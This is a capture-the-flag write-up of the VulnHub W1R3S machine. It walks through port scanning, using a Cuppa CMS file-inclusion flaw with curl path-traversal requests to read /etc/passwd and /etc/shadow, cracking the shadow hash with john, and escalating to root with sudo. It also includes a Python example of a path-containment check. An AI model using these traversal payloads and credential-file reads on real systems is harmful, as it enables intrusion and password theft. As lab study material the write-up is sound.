Target machine: W1R3S: 1 ~ VulnHub
Difficulty: 1.5 / 10.0
This article briefly records each step of penetrating the target machine; not every step is described in full detail, and some of the content may contain errors. Readers are welcome to point them out, thank you!
Abstract: After scanning, the /administrator directory on port 80 revealed that the site runs the Cuppa CMS framework. Googling for vulnerabilities in this CMS turned up an L/RFI vulnerability; curl was used to retrieve the passwd and shadow files, john cracked the W1R3S password from the shadow entry, and after logging in, privileges were escalated directly with sudo.
Areas for improvement: further study of local/remote file inclusion vulnerabilities
Host discovery & port scanning
Target IP: 192.168.42.131
Port scan results:
hhh@Kali2020:~$ nmap -A -sV -T5 -p- 192.168.42.131
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-30 14:55 CST
Nmap scan report for 192.168.42.131
Host is up (0.00022s latency).
Not shown: 55528 filtered ports, 10003 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 content
| drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 docs
|_drwxr-xr-x 2 ftp ftp 4096 Jan 28 2018 new-employees
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.42.130
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 07:e3:5a:5c:c8:18:65:b0:5f:6e:f7:75:c7:7e:11:e0 (RSA)
| 256 03:ab:9a:ed:0c:9b:32:26:44:13:ad:b0:b0:96:c3:1e (ECDSA)
|_ 256 3d:6d:d2:4b:46:e8:c9:a3:49:e0:93:56:22:2e:e3:54 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3306/tcp open mysql MySQL (unauthorized)
Service Info: Host: W1R3S.inc; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.83 seconds
Information gathering
Port 21: FTP service
- First, connect to the FTP service
ftp 192.168.42.131
Following the VRFY command learned earlier, I tried it here as well, but it did not work; moving on
- List the directories and enter each one in turn
Only some irrelevant information was found, which also hints that FTP is not where the penetration is meant to happen
Port 80
Used dirb to brute-force directories; visiting the administrator directory reveals that the site runs the Cuppa CMS framework
dirb http://192.168.42.131
---- Scanning URL: http://192.168.42.131/ ----
==> DIRECTORY: http://192.168.42.131/administrator/
+ http://192.168.42.131/index.html (CODE:200|SIZE:11321)
==> DIRECTORY: http://192.168.42.131/javascript/
+ http://192.168.42.131/server-status (CODE:403|SIZE:302)
==> DIRECTORY: http://192.168.42.131/wordpress/
Searching for vulnerabilities in the Cuppa CMS framework turned up a Local/Remote File Inclusion vulnerability:
https://www.exploit-db.com/exploits/25971
Following its contents, I tried the URL below, but with no result.
http://192.168.42.131/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
Using curl to exploit the LFI vulnerability and retrieve the files (curl usage notes follow the commands):
Retrieve /etc/passwd:
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.42.131/administrator/alerts/alertConfigField.php
Retrieve /etc/shadow:
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.42.131/administrator/alerts/alertConfigField.php
-s: suppress error and progress output
--data-urlencode: send the given data as the body of a POST request (URL-encoded)
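The two curl calls above work because the handler takes the request value as a path and resolves it relative to a directory under the web root, so any chain of ../ long enough to climb to / ends at /etc/passwd regardless of the exact depth. The following Python is an added example, not code from this write-up or from Cuppa CMS; it models that resolution and shows the containment check such a handler should apply (WEB_ROOT and ALLOWED_DIR are constructed paths, not the target's).

```python
import os
from urllib.parse import unquote

# Constructed paths for the example; not the real target's layout.
WEB_ROOT = "/var/www/html"
ALLOWED_DIR = os.path.join(WEB_ROOT, "administrator", "alerts", "config")


def resolve_include(decoded_value, base_dir=ALLOWED_DIR):
    """Model a naive include(): join the (already URL-decoded) parameter onto
    the handler's directory and collapse '.' and '..' lexically.
    normpath drops any '..' that would climb above '/', which is why nine
    '../' still reach /etc/passwd although base_dir is only six levels deep."""
    candidate = decoded_value
    if not os.path.isabs(candidate):
        candidate = os.path.join(base_dir, candidate)
    return os.path.normpath(candidate)


def safe_include_path(user_value, base_dir=ALLOWED_DIR):
    """Hardened variant: decode once (as the web server does), then return the
    resolved path only if it is a .php file that still lies inside base_dir;
    otherwise return None."""
    decoded = unquote(user_value)
    # Remote inclusion: reject anything that carries a URL scheme.
    if "://" in decoded:
        return None
    resolved = resolve_include(decoded, base_dir)
    # commonpath is a real containment test; a plain startswith() would
    # wrongly accept a sibling directory such as base_dir + "_old/".
    if os.path.commonpath([base_dir, resolved]) != base_dir:
        return None
    if not resolved.endswith(".php"):
        return None
    return resolved
```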
Gaining access
After obtaining /etc/shadow, crack it with john: copy the w1r3s password entry from the shadow file into a text file named password.txt
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
Crack it with john
john password.txt
Password obtained: computer
Privilege escalation
Check the target's information: Ubuntu 16.04 | Linux kernel 4.13
w1r3s@W1R3S:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04.3 LTS
Release: 16.04
Codename: xenial
w1r3s@W1R3S:~$ uname -a
Linux W1R3S 4.13.0-36-generic #40~16.04.1-Ubuntu SMP Fri Feb 16 23:25:58 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
Method one: sudo directly
Checking the output of sudo -l shows that privileges can be escalated directly (a little too easy)
w1r3s@W1R3S:~$ sudo -l
[sudo] password for w1r3s:
Matching Defaults entries for w1r3s on W1R3S.localdomain:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User w1r3s may run the following commands on W1R3S.localdomain:
(ALL : ALL) ALL
Then escalate directly with sudo su
sudo su
Go to the /root directory and read flag.txt
Summary
- LFI vulnerability
- The curl command
- /etc/passwd & /etc/shadow
- Cracking passwords with john